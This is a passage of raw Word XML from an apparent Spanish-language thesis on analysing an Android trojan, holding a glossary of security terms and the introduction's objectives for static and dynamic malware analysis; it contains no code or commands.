    <w:p w14:paraId="574FE1D4" w14:textId="7523FEF6" w:rsidR="00773961" w:rsidRDefault="00773961" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>DEX</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>: iniciales de Dalvik Executable, formato de bytecode que utiliza</w:t>
      </w:r>
      <w:r w:rsidR="009C6262">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> la</w:t>
      </w:r>
      <w:r w:rsidR="009C6262">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> máquina</w:t>
      </w:r>
      <w:r w:rsidR="009C6262">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtua</w:t>
      </w:r>
      <w:r w:rsidR="009C6262">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>les</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="009C6262">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">ART y </w:t>
      </w:r>
      <w:r w:rsidR="00D1653E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Dalvik de las aplicaciones Android. El compilador DEX es el encargado de traducir el código fuente Java o Kotlin en DEX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DD617" w14:textId="44CD432F" w:rsidR="00737A20" w:rsidRDefault="00737A20" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">JAR: </w:t>
      </w:r>
      <w:r w:rsidR="00B94BB7">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>formato contenedor Java Archive, que sirve para empaquetar clases en lenguaje Java, así como sus recursos y metadatos. Se utiliza para la distribución de aplicaciones Java</w:t>
      </w:r>
      <w:r w:rsidR="008064B5">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">. Puede ser </w:t>
      </w:r>
      <w:r w:rsidR="00C36F76">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">de tipo </w:t>
      </w:r>
      <w:r w:rsidR="008064B5">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>ejecutabl</w:t>
      </w:r>
      <w:r w:rsidR="001715DA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">e, en cuyo caso </w:t>
      </w:r>
      <w:r w:rsidR="008064B5">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>indica una clase de entrada</w:t>
      </w:r>
      <w:r w:rsidR="001715DA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> en su manifiesto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E6594" w14:textId="1D1F12D4" w:rsidR="00E95A92" w:rsidRPr="00E946EA" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9370F">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidR="00065462">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">: acrónimo en inglés de Advanced Persistent Thread. Hace referencia a grupos de atacantes informáticos de gran sofisticación y </w:t>
      </w:r>
      <w:r w:rsidR="002F7A16">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">poseedores de </w:t>
      </w:r>
      <w:r w:rsidR="00065462">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>cantidad de recursos</w:t>
      </w:r>
      <w:r w:rsidR="002F7A16">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> para realizar sus operaciones</w:t>
      </w:r>
      <w:r w:rsidR="00065462">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>. Suelen ser grupos con financiación y apoyo de grandes organizaciones,</w:t>
      </w:r>
      <w:r w:rsidR="005A6F76">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00065462" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">algunas de ellas </w:t>
      </w:r>
      <w:r w:rsidR="005A6F76">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">a menudo </w:t>
      </w:r>
      <w:r w:rsidR="00065462" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>estados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB224E4" w14:textId="426A8E04" w:rsidR="00773961" w:rsidRPr="00E946EA" w:rsidRDefault="00773961" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>: indicadores de compromiso en español, son conjunto de datos y evidencias generados por una actividad realizada que indican las características de una amenaza. Pueden englobar ficheros creados, procesos ejecutados, dominios o</w:t>
      </w:r>
      <w:r w:rsidR="002F7A16">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> direcciones</w:t>
      </w:r>
      <w:r w:rsidR="00D1653E" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP contactadas entre otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A40C9F0" w14:textId="27C28AE6" w:rsidR="00520AA1" w:rsidRDefault="00520AA1" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5: </w:t>
      </w:r>
      <w:r w:rsidR="004E3BEB" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">algoritmo </w:t>
      </w:r>
      <w:r w:rsidR="00DD48D9" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">criptográfico </w:t>
      </w:r>
      <w:r w:rsidR="004E3BEB" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">de reducción que genera un valor de 128 bits </w:t>
      </w:r>
      <w:r w:rsidR="00C82F34" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>a partir de una entrada de valor arbitrario. Se utiliza a entre otros a modo de checksum para verificar la integridad de los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31509C09" w14:textId="4EE3292D" w:rsidR="00AD5295" w:rsidRPr="00E946EA" w:rsidRDefault="00AD5295" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC34EE0" w14:textId="6CE30F8C" w:rsidR="00961F5F" w:rsidRPr="00E946EA" w:rsidRDefault="00961F5F" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">DDoS: </w:t>
      </w:r>
      <w:r w:rsidR="00B4562A" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>ataque distribuido de denegación de servicio, consistente en la sobrecarga de una infraestructura informática como puede ser un sitio web o un servidor y provocando problemas de disponibilidad en este. En gran parte de los casos, estos ataques utilizan redes de dispositivos infectados y controlados remotamente, conocidos como botnets, para llevar a cabo las ofensivas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16411C8D" w14:textId="5AE5776E" w:rsidR="00EF4B46" w:rsidRPr="00E946EA" w:rsidRDefault="00EF4B46" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptojacking: tipo de delito informático en el que los dispositivos infectados son utilizados por los atacantes para el minado de criptomonedas </w:t>
      </w:r>
      <w:r w:rsidR="00F17138" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">sin el conocimiento de la víctima que posee el dispositivo y con el fin de </w:t>
      </w:r>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">obtener </w:t>
      </w:r>
      <w:r w:rsidR="00F17138" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>un beneficio económico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71EE6C" w14:textId="2C0E3CC0" w:rsidR="00257638" w:rsidRDefault="00257638" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>DNS: sistema de nombres de dominio jerárquico y distribuido que establece un sistema de nombres y direcciones para dispositivos que forman parte de Internet.</w:t>
      </w:r>
      <w:r w:rsidR="00713E11" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> Delega la responsabilidad de gestionar nombres y relaciones para cada dominio a </w:t>
      </w:r>
      <w:r w:rsidR="00B13208" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">sus </w:t>
      </w:r>
      <w:r w:rsidR="00713E11" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>servidores DNS autoritativos</w:t>
      </w:r>
      <w:r w:rsidR="00B13208" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> correspondientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF8617" w14:textId="7452D505" w:rsidR="00AD5295" w:rsidRPr="00E946EA" w:rsidRDefault="00AD5295" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>API:</w:t>
      </w:r>
      <w:r w:rsidR="009E057B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> también conocida como interfaz de programación, es un grupo de definiciones y protocolos que sirven para la integración de diferentes componentes de software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716C973" w14:textId="39A03628" w:rsidR="00F43B85" w:rsidRPr="00E946EA" w:rsidRDefault="00F43B85" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">C&amp;C: del inglés </w:t>
      </w:r>
      <w:r w:rsidR="00640F2A" w:rsidRPr="00E946EA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Command &amp; Control, también conocido como C2, alude a la infraestructura utilizada por los atacantes para controlar los equipos infectados de manera remota a través de una comunicación entre los servidores del C2 y los dispositivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3BEBCB" w14:textId="324DEDCB" w:rsidR="00961F5F" w:rsidRPr="00E7716A" w:rsidRDefault="00961F5F" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:sectPr w:rsidR="00961F5F" w:rsidRPr="00E7716A" w:rsidSect="00E95A92">
          <w:headerReference w:type="default" r:id="rId23"/>
          <w:footerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1701" w:right="1418" w:bottom="1418" w:left="1701" w:header="1418" w:footer="1247" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D1BE83" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4186736B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc107862671"/>
      <w:bookmarkStart w:id="7" w:name="_Toc170500145"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Introducción</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5E06A2D1" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA108B0" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PLANTEAMIENTO DEL PROBLEMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD71CD5" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A79E981" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OBJETIVOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFB056" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591CAF1A" w14:textId="7A5338B1" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00BE221D">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El objetivo principal de este trabajo es el análisis en profundidad de una muestra de malware de tipo troyano desarrollado para plataformas Android. Los </w:t>
      </w:r>
      <w:r w:rsidR="00E90117">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>objetivos que se esperan cumplir mediante la realización del proyecto son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92516D" w14:textId="24E4C16B" w:rsidR="00C668B2" w:rsidRDefault="00C668B2" w:rsidP="00C668B2">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">O1 – </w:t>
      </w:r>
      <w:r w:rsidR="00233F32">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Enmarcar </w:t>
      </w:r>
      <w:r w:rsidR="00A5331B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware </w:t>
      </w:r>
      <w:r w:rsidR="00A5331B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">elegido </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y la familia de la que procede dentro del ecosistema actual de troyanos de plataformas Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322899AE" w14:textId="0346A839" w:rsidR="00801932" w:rsidRDefault="00801932" w:rsidP="00C668B2">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>O2 -</w:t>
      </w:r>
      <w:r w:rsidR="00233F32">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realizar un análisis de los mecanismos de distribución del malware</w:t>
      </w:r>
      <w:r w:rsidR="005E2C85">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y de su vector o vectores de ataque en el sistema Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FCDBFA" w14:textId="501673FB" w:rsidR="00335DE8" w:rsidRDefault="00335DE8" w:rsidP="00C668B2">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">O3 - </w:t>
      </w:r>
      <w:r w:rsidR="00233F32">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Llevar a cabo un análisis estático del </w:t>
      </w:r>
      <w:r w:rsidR="003B49C0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">código </w:t>
      </w:r>
      <w:r w:rsidR="000B2AAF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>malware para tratar de comprender sus capacidades y modus operandi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074284B" w14:textId="094903B8" w:rsidR="003B49C0" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">3 – </w:t>
      </w:r>
      <w:r w:rsidR="00233F32">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realizar un análisis dinámico del malware en un entorno controlado, que permita observar cómo se comporta una vez instalado y ejecutado en un dispositivo infectado</w:t>
      </w:r>
      <w:r w:rsidR="002850DA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
